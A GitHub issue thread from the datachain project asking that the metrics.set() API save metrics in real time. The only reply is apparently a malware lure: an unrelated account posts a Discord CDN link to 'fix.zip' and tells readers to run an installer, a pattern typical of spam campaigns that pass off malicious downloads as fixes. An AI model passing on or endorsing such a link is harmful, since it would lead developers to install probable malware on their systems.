### ISSUE TITLE
save metrics in real-time

### ISSUE THREAD

**Issue by skshetry** [iterative/datachain#384]
### Description

`metrics.set()` API saves metrics in memory, and later sends it to the main process to save it to the database.

https://github.com/iterative/datachain/blob/af5e9cbcefefe5cde9e0528cf38b2f8ac810d69c/src/datachain/cli.py#L868

This should happen in real-time, inside the user's script.

And this API should also work for when scripts are run outside of `datachain query` command. 

Part of #360.

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
